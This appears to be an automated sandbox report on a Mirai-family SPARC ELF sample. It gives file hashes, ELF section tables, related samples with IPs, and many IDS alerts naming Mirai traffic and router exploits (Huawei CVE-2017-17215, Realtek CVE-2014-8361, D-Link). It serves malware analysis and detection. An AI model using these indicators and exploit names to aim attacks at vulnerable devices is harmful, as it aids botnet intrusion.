                            Z8denVNHpJ.elfGet hashmaliciousBrowse
                            • 2.94.177.79
                            PS18evDn7s.elfGet hashmaliciousBrowse
                            • 85.21.71.47
                            7oElHDhfdA.elfGet hashmaliciousBrowse
                            • 95.29.14.175
                            7uOVw0kjLY.elfGet hashmaliciousBrowse
                            • 95.24.169.241
                            7EZcMORI33.elfGet hashmaliciousBrowse
                            • 78.107.190.137
                            Q4rmBnX2NT.elfGet hashmaliciousBrowse
                            • 85.21.71.60
                            a2hg56YL8y.elfGet hashmaliciousBrowse
                            • 95.28.117.25
                            BDGCZlR2YL.elfGet hashmaliciousBrowse
                            • 2.93.165.206
                            0G3JD5UXyl.elfGet hashmaliciousBrowse
                            • 95.24.170.108
                            xsbHyvxCgs.elfGet hashmaliciousBrowse
                            • 78.107.190.124
                            x86-20221013-0611.elfGet hashmaliciousBrowse
                            • 37.144.25.230
                            NmgshxQv7g.elfGet hashmaliciousBrowse
                            • 128.72.30.95
                            kiFWEWjTPk.exeGet hashmaliciousBrowse
                            • 37.144.217.172
                            yAczmAdl49.elfGet hashmaliciousBrowse
                            • 95.24.169.233
                            DRL8J3CIbk.elfGet hashmaliciousBrowse
                            • 89.113.205.129
                            cdDHJ7f6r5.elfGet hashmaliciousBrowse
                            • 95.24.169.233
                            4NakbgBoDV.elfGet hashmaliciousBrowse
                            • 37.145.99.134
                            ymIATNgbUU.elfGet hashmaliciousBrowse
                            • 2.93.60.219
                            No context
                            No context
                            No created / dropped files found
                            File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
                            Entropy (8bit):6.296373513373018
                            TrID:
                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                            File name:fMB6uAXjd0.elf
                            File size:88440
                            MD5:e8a738a14a114c60324a7cbfb61730bd
                            SHA1:f152928b44a9025929b905e8d2e5c7b258d6b98e
                            SHA256:fb178c4ffa1bd9d6b872187f35a1b4330e58dc83bff5b633bd1e4ff0c114c2d0
                            SHA512:0173bf1b67314fb2d1827026ddbb9eb5c7c2dbc025fa28e570d0eabcd09dd47903c27cd0b11d5b6dcea43eaa4b568925ca5dd8b5b8768abfaaf61dd8a66550ed
                            SSDEEP:1536:BsjSSSz5QjIlZWUNT6SmPcnsPYsTSG6fQl+16PawWu6u:6jbRD90nyYgvq1c
                            TLSH:9A836C32AD7A3D57C1C1A4BA12F70361F1F2174A35E8C22D7DB10E1DEF58A60292767A
                            File Content Preview:.ELF...........................4..W......4. ...(......................SX..SX..............S\..S\..S\...L...l........dt.Q................................@..(....@.K.................#.....c...`.....!.....#t..@.....".........`......$#t..#t..@...........`....

                            ELF header

                            Class:
                            Data:
                            Version:
                            Machine:
                            Version Number:
                            Type:
                            OS/ABI:
                            ABI Version:
                            Entry Point Address:
                            Flags:
                            ELF Header Size:
                            Program Header Offset:
                            Program Header Size:
                            Number of Program Headers:
                            Section Header Offset:
                            Section Header Size:
                            Number of Section Headers:
                            Header String Table Index:
                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                            NULL0x00x00x00x00x0000
                            .initPROGBITS0x100940x940x1c0x00x6AX004
                            .textPROGBITS0x100b00xb00x12ca40x00x6AX004
                            .finiPROGBITS0x22d540x12d540x140x00x6AX004
                            .rodataPROGBITS0x22d680x12d680x25f00x00x2A008
                            .ctorsPROGBITS0x3535c0x1535c0x80x00x3WA004
                            .dtorsPROGBITS0x353640x153640x80x00x3WA004
                            .dataPROGBITS0x353700x153700x4380x00x3WA008
                            .bssNOBITS0x357a80x157a80x4200x00x3WA008
                            .shstrtabSTRTAB0x00x157a80x3e0x00x0001
                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                            LOAD0x00x100000x100000x153580x153586.32140x5R E0x10000.init .text .fini .rodata
                            LOAD0x1535c0x3535c0x3535c0x44c0x86c3.31970x6RW 0x10000.ctors .dtors .data .bss
                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            192.168.2.2383.169.5.15443118802846380 10/23/22-17:57:01.341530TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4311880192.168.2.2383.169.5.154
                            192.168.2.23195.77.239.10450098802846457 10/23/22-17:58:21.709517TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5009880192.168.2.23195.77.239.104
                            192.168.2.23188.66.75.17447020802846457 10/23/22-17:58:07.972266TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4702080192.168.2.23188.66.75.174
                            192.168.2.2388.221.153.18655382802027121 10/23/22-17:57:13.448584TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5538280192.168.2.2388.221.153.186
                            192.168.2.2393.188.246.18639222802841623 10/23/22-17:56:53.628982TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3922280192.168.2.2393.188.246.186
                            192.168.2.2389.210.138.12548964802846457 10/23/22-17:58:10.349893TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4896480192.168.2.2389.210.138.125
                            192.168.2.23178.62.200.14141160802846380 10/23/22-17:58:27.467122TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4116080192.168.2.23178.62.200.141
                            192.168.2.2382.157.21.19744928802846380 10/23/22-17:57:55.462907TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4492880192.168.2.2382.157.21.197
                            192.168.2.2386.120.194.18837138802846380 10/23/22-17:58:19.944979TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3713880192.168.2.2386.120.194.188
                            192.168.2.2395.79.48.17445426802027121 10/23/22-17:57:36.434806TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4542680192.168.2.2395.79.48.174
                            192.168.2.2346.29.250.14645486802846457 10/23/22-17:57:53.195768TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4548680192.168.2.2346.29.250.146
                            192.168.2.2395.163.80.19756796802027121 10/23/22-17:56:55.629477TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5679680192.168.2.2395.163.80.197
                            192.168.2.2389.22.112.18335916802846457 10/23/22-17:57:55.908028TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3591680192.168.2.2389.22.112.183
                            192.168.2.2383.1.194.4741534802846380 10/23/22-17:58:31.017754TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4153480192.168.2.2383.1.194.47
                            192.168.2.2388.99.138.11735390802027121 10/23/22-17:56:51.035586TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3539080192.168.2.2388.99.138.117
                            192.168.2.2352.40.241.15145210802841623 10/23/22-17:57:20.230013TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4521080192.168.2.2352.40.241.151
                            192.168.2.23213.16.50.17051602802846380 10/23/22-17:56:58.195822TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5160280192.168.2.23213.16.50.170
                            192.168.2.23213.238.59.18058408802846380 10/23/22-17:57:54.109941TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5840880192.168.2.23213.238.59.180
                            192.168.2.23178.115.247.1737470802846380 10/23/22-17:57:27.993436TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3747080192.168.2.23178.115.247.17
                            192.168.2.2395.68.25.3137366802027121 10/23/22-17:58:15.253758TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3736680192.168.2.2395.68.25.31
                            192.168.2.23112.48.187.1541664802027121 10/23/22-17:58:25.717935TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4166480192.168.2.23112.48.187.15
                            192.168.2.23104.173.4.1365681275472023548 10/23/22-17:57:55.431713TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE568127547192.168.2.23104.173.4.136
                            192.168.2.238.219.182.6137142802835222 10/23/22-17:58:09.988784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714280192.168.2.238.219.182.61
                            192.168.2.2395.168.211.6555322802027121 10/23/22-17:57:43.876716TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5532280192.168.2.2395.168.211.65
                            192.168.2.23213.176.44.8249726802846380 10/23/22-17:57:37.999015TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4972680192.168.2.23213.176.44.82
                            192.168.2.2395.100.239.12337604802027121 10/23/22-17:57:34.527124TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3760480192.168.2.2395.100.239.123
                            192.168.2.23206.249.235.6154176802846380 10/23/22-17:57:29.944319TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5417680192.168.2.23206.249.235.61
                            192.168.2.2385.128.243.14737520802846457 10/23/22-17:58:01.351031TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3752080192.168.2.2385.128.243.147
                            192.168.2.2395.156.238.959532802027121 10/23/22-17:57:10.578364TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5953280192.168.2.2395.156.238.9
                            192.168.2.2384.137.62.24135770802846457 10/23/22-17:57:18.368357TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3577080192.168.2.2384.137.62.241
                            192.168.2.23195.9.94.19850198802846457 10/23/22-17:58:21.697652TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5019880192.168.2.23195.9.94.198
                            192.168.2.2395.217.48.16641132802027121 10/23/22-17:58:27.445125TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4113280192.168.2.2395.217.48.166
                            192.168.2.2388.249.124.14641718802027121 10/23/22-17:57:05.166994TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4171880192.168.2.2388.249.124.146
                            192.168.2.2337.109.51.1952366802846457 10/23/22-17:56:51.879347TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5236680192.168.2.2337.109.51.19
                            192.168.2.23200.94.112.9738864802846380 10/23/22-17:58:17.610079TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3886480192.168.2.23200.94.112.97
                            192.168.2.23122.254.97.7133850528692027339 10/23/22-17:58:20.061747TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3385052869192.168.2.23122.254.97.71
                            192.168.2.2384.86.92.6547494802846457 10/23/22-17:57:56.399097TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4749480192.168.2.2384.86.92.65
                            192.168.2.2388.221.76.11652184802027121 10/23/22-17:56:55.629611TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5218480192.168.2.2388.221.76.116
                            192.168.2.2388.221.68.24436880802027121 10/23/22-17:58:09.637346TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3688080192.168.2.2388.221.68.244
                            192.168.2.232.18.235.2359882802846457 10/23/22-17:57:28.754342TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5988280192.168.2.232.18.235.23
                            192.168.2.23188.128.164.13538398802846457 10/23/22-17:58:07.920925TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3839880192.168.2.23188.128.164.135
                            192.168.2.23112.48.187.1541692802027121 10/23/22-17:58:25.936044TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4169280192.168.2.23112.48.187.15
                            192.168.2.2389.32.148.7040040802846457 10/23/22-17:57:38.011306TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4004080192.168.2.2389.32.148.70
                            192.168.2.2337.211.17.20059408802846457 10/23/22-17:57:29.018473TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5940880192.168.2.2337.211.17.200
                            192.168.2.2382.223.227.3937670802846380 10/23/22-17:57:07.329740TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3767080192.168.2.2382.223.227.39
                            192.168.2.2384.7.151.1646206528692027339 10/23/22-17:57:20.270827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4620652869192.168.2.2384.7.151.16
                            192.168.2.2395.188.129.15556402802027121 10/23/22-17:57:21.135322TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5640280192.168.2.2395.188.129.155
                            192.168.2.23202.90.153.22354594802841623 10/23/22-17:58:14.263264TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5459480192.168.2.23202.90.153.223
                            192.168.2.23171.238.97.3759214802846457 10/23/22-17:57:59.974478TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5921480192.168.2.23171.238.97.37
                            192.168.2.2395.101.162.9437358802027121 10/23/22-17:58:27.488384TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3735880192.168.2.2395.101.162.94
                            192.168.2.23162.83.143.18849864802841623 10/23/22-17:57:20.378520TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4986480192.168.2.23162.83.143.188
                            192.168.2.23178.62.89.16655268802846380 10/23/22-17:58:27.260602TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5526880192.168.2.23178.62.89.166
                            192.168.2.2382.153.27.20945256802846380 10/23/22-17:58:04.029491TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4525680192.168.2.2382.153.27.209
                            192.168.2.2388.221.47.15358532802027121 10/23/22-17:57:18.680205TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5853280192.168.2.2388.221.47.153
                            192.168.2.23213.159.7.240422802846380 10/23/22-17:56:58.194033TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4042280192.168.2.23213.159.7.2
                            192.168.2.2385.128.198.10960226802846457 10/23/22-17:58:01.351204TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6022680192.168.2.2385.128.198.109
                            192.168.2.2389.207.18.18044328528692027339 10/23/22-17:57:44.641165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4432852869192.168.2.2389.207.18.180
                            192.168.2.2377.163.130.22032968802835222 10/23/22-17:57:04.036152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296880192.168.2.2377.163.130.220
                            192.168.2.23213.168.162.15245228802846380 10/23/22-17:57:48.525193TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4522880192.168.2.23213.168.162.152
                            192.168.2.2395.217.208.24347200802027121 10/23/22-17:57:13.009624TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4720080192.168.2.2395.217.208.243
                            192.168.2.2395.101.158.22234014802027121 10/23/22-17:58:15.265646TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3401480192.168.2.2395.101.158.222
                            192.168.2.2361.241.147.22837886802846457 10/23/22-17:57:51.681033TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3788680192.168.2.2361.241.147.228
                            192.168.2.2354.217.124.4532912802835221 10/23/22-17:58:21.159984TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)3291280192.168.2.2354.217.124.45
                            192.168.2.2337.72.203.3554416528692027339 10/23/22-17:58:30.504592TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5441652869192.168.2.2337.72.203.35
                            192.168.2.2388.250.162.18057872802027121 10/23/22-17:57:21.371554TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5787280192.168.2.2388.250.162.180
                            192.168.2.23178.33.108.12760484802846380 10/23/22-17:58:13.489022TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6048480192.168.2.23178.33.108.127
                            192.168.2.2395.175.97.5146688802027121 10/23/22-17:57:34.533379TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4668880192.168.2.2395.175.97.51
                            192.168.2.23164.70.13.6947254802846457 10/23/22-17:57:55.976971TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4725480192.168.2.23164.70.13.69
                            192.168.2.23188.40.218.12641988802846457 10/23/22-17:58:07.896485TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4198880192.168.2.23188.40.218.126
                            192.168.2.2388.203.186.17933278802027121 10/23/22-17:58:10.598501TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3327880192.168.2.2388.203.186.179
                            192.168.2.2395.216.76.15342048802027121 10/23/22-17:58:24.028327TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4204880192.168.2.2395.216.76.153
                            192.168.2.2372.34.52.1655066802841623 10/23/22-17:56:49.234026TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5506680192.168.2.2372.34.52.16
                            192.168.2.2385.235.62.23945792802846457 10/23/22-17:57:58.585748TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4579280192.168.2.2385.235.62.239
                            192.168.2.235.35.226.7539522802846457 10/23/22-17:57:08.374548TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3952280192.168.2.235.35.226.75
                            192.168.2.23149.96.34.12645698802841623 10/23/22-17:57:38.794574TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4569880192.168.2.23149.96.34.126
                            192.168.2.23188.68.47.12635108802846457 10/23/22-17:58:17.658160TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3510880192.168.2.23188.68.47.126
                            192.168.2.23112.221.131.23353588802027121 10/23/22-17:57:28.559296TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5358880192.168.2.23112.221.131.233
                            192.168.2.2380.147.77.6857926802846457 10/23/22-17:56:52.718808TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5792680192.168.2.2380.147.77.68
                            192.168.2.2380.32.107.3547024802846380 10/23/22-17:58:39.164334TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4702480192.168.2.2380.32.107.35
                            192.168.2.23206.51.235.12354264802846380 10/23/22-17:57:29.458919TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5426480192.168.2.23206.51.235.123
                            192.168.2.2388.221.218.5943938802027121 10/23/22-17:57:38.609285TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4393880192.168.2.2388.221.218.59
                            192.168.2.2395.160.28.4750678802027121 10/23/22-17:57:49.805107TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5067880192.168.2.2395.160.28.47
                            192.168.2.2388.19.134.10941042802027121 10/23/22-17:58:02.124782TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4104280192.168.2.2388.19.134.109
                            192.168.2.23200.84.15.11857298802841623 10/23/22-17:57:38.963880TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5729880192.168.2.23200.84.15.118
                            192.168.2.2346.137.174.23059784802846457 10/23/22-17:58:05.463276TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5978480192.168.2.2346.137.174.230
                            192.168.2.23112.124.15.20654442802027121 10/23/22-17:57:06.686727TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5444280192.168.2.23112.124.15.206
                            192.168.2.23213.150.218.4533260802846380 10/23/22-17:58:33.498606TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3326080192.168.2.23213.150.218.45
                            192.168.2.23171.245.102.22355776528692027339 10/23/22-17:57:24.764501TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5577652869192.168.2.23171.245.102.223
                            192.168.2.23171.245.102.22355778528692027339 10/23/22-17:57:25.068090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5577852869192.168.2.23171.245.102.223
                            192.168.2.2395.179.158.25459052802027121 10/23/22-17:57:34.506424TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5905280192.168.2.2395.179.158.254
                            192.168.2.2389.207.18.18044326528692027339 10/23/22-17:57:44.623923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4432652869192.168.2.2389.207.18.180
                            192.168.2.23213.176.39.22639328802846380 10/23/22-17:56:47.130746TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3932880192.168.2.23213.176.39.226
                            192.168.2.2395.100.176.5534038802027121 10/23/22-17:57:23.530626TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3403880192.168.2.2395.100.176.55
                            192.168.2.23112.50.105.2350420802027121 10/23/22-17:57:34.483562TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5042080192.168.2.23112.50.105.23
                            192.168.2.23123.200.139.11556904802841623 10/23/22-17:58:14.941149TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5690480192.168.2.23123.200.139.115
                            192.168.2.2395.179.201.5743146802027121 10/23/22-17:57:12.977664TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4314680192.168.2.2395.179.201.57
                            192.168.2.23186.211.177.1947854802841623 10/23/22-17:58:37.852912TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4785480192.168.2.23186.211.177.19
                            192.168.2.235.189.103.9338736802846457 10/23/22-17:56:55.153771TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3873680192.168.2.235.189.103.93
                            192.168.2.2384.33.211.2247624802846457 10/23/22-17:57:18.332948TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4762480192.168.2.2384.33.211.22
                            192.168.2.23122.236.227.17438626528692027339 10/23/22-17:58:14.560497TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3862652869192.168.2.23122.236.227.174
                            192.168.2.2346.149.136.8253522802846457 10/23/22-17:58:24.203876TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5352280192.168.2.2346.149.136.82
                            192.168.2.23181.214.43.23638530802846380 10/23/22-17:58:17.412817TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3853080192.168.2.23181.214.43.236
                            192.168.2.23200.88.174.14153992802846380 10/23/22-17:57:30.680768TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5399280192.168.2.23200.88.174.141
                            192.168.2.23104.111.37.23347442802841623 10/23/22-17:57:12.707942TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4744280192.168.2.23104.111.37.233
                            192.168.2.2345.195.13.8751334372152835222 10/23/22-17:57:51.987216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133437215192.168.2.2345.195.13.87
                            192.168.2.23112.213.124.21438934802027121 10/23/22-17:58:25.434539TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3893480192.168.2.23112.213.124.214
                            192.168.2.2388.123.26.19642432802027121 10/23/22-17:57:56.401490TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4243280192.168.2.2388.123.26.196
                            192.168.2.2385.204.125.1342798802846457 10/23/22-17:57:31.246149TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4279880192.168.2.2385.204.125.13
                            192.168.2.2395.86.88.5645308802027121 10/23/22-17:57:36.438934TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4530880192.168.2.2395.86.88.56
                            192.168.2.2384.6.148.3449252372152835222 10/23/22-17:58:21.931096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925237215192.168.2.2384.6.148.34
                            192.168.2.23206.249.241.10854290802846380 10/23/22-17:57:55.604498TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5429080192.168.2.23206.249.241.108
                            192.168.2.2388.80.170.4334972802027121 10/23/22-17:56:53.231278TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3497280192.168.2.2388.80.170.43
                            192.168.2.23206.189.43.11348598802846380 10/23/22-17:57:40.722817TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4859880192.168.2.23206.189.43.113
                            192.168.2.23200.61.47.20360798802846380 10/23/22-17:57:15.792879TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6079880192.168.2.23200.61.47.203
                            192.168.2.2380.254.172.25035230802846380 10/23/22-17:57:51.839646TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3523080192.168.2.2380.254.172.250
                            192.168.2.2388.214.226.17042140802027121 10/23/22-17:58:09.830555TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4214080192.168.2.2388.214.226.170
                            192.168.2.2380.30.56.4234240802846380 10/23/22-17:57:11.436345TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3424080192.168.2.2380.30.56.42
                            192.168.2.2386.106.184.13752658802846380 10/23/22-17:57:07.241745TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5265880192.168.2.2386.106.184.137
                            192.168.2.23112.167.187.22938242802027121 10/23/22-17:56:58.388006TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3824280192.168.2.23112.167.187.229
                            192.168.2.23181.31.102.22742032802835221 10/23/22-17:57:28.350931TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4203280192.168.2.23181.31.102.227
                            192.168.2.2389.133.92.21345654802846457 10/23/22-17:57:07.102618TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4565480192.168.2.2389.133.92.213
                            192.168.2.2380.133.216.19254798802846457 10/23/22-17:57:09.746440TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5479880192.168.2.2380.133.216.192
                            192.168.2.2368.183.20.5556204802835221 10/23/22-17:57:16.524200TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5620480192.168.2.2368.183.20.55
                            192.168.2.2346.47.178.14036312802846457 10/23/22-17:58:23.968200TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3631280192.168.2.2346.47.178.140
                            192.168.2.2389.17.195.15235104802846457 10/23/22-17:56:45.537309TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3510480192.168.2.2389.17.195.152
                            192.168.2.2354.186.196.19739546802835222 10/23/22-17:58:21.330242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954680192.168.2.2354.186.196.197
                            192.168.2.2384.63.236.20137248802846457 10/23/22-17:58:15.349097TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3724880192.168.2.2384.63.236.201
                            192.168.2.2386.178.155.20843434802846380 10/23/22-17:56:52.007644TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4343480192.168.2.2386.178.155.208
                            192.168.2.23206.189.61.24160302802846380 10/23/22-17:57:27.985364TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6030280192.168.2.23206.189.61.241
                            192.168.2.23206.189.255.20040508802846380 10/23/22-17:57:29.190289TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4050880192.168.2.23206.189.255.200
                            192.168.2.23178.128.51.5742052802846380 10/23/22-17:57:49.583215TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4205280192.168.2.23178.128.51.57
                            192.168.2.2346.242.216.640752802846457 10/23/22-17:58:15.375651TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4075280192.168.2.2346.242.216.6
                            192.168.2.2395.100.200.18636474802027121 10/23/22-17:57:10.331694TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3647480192.168.2.2395.100.200.186
                            192.168.2.2323.193.128.3349350802841623 10/23/22-17:56:49.229770TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4935080192.168.2.2323.193.128.33
                            192.168.2.23200.220.171.25341570802846380 10/23/22-17:57:10.820527TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4157080192.168.2.23200.220.171.253
                            192.168.2.2354.230.173.5636476802835222 10/23/22-17:58:09.999286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3647680192.168.2.2354.230.173.56
                            192.168.2.2385.214.95.21554314802846457 10/23/22-17:57:41.195866TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5431480192.168.2.2385.214.95.215
                            192.168.2.23178.210.90.11445722802846380 10/23/22-17:57:09.503409TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4572280192.168.2.23178.210.90.114
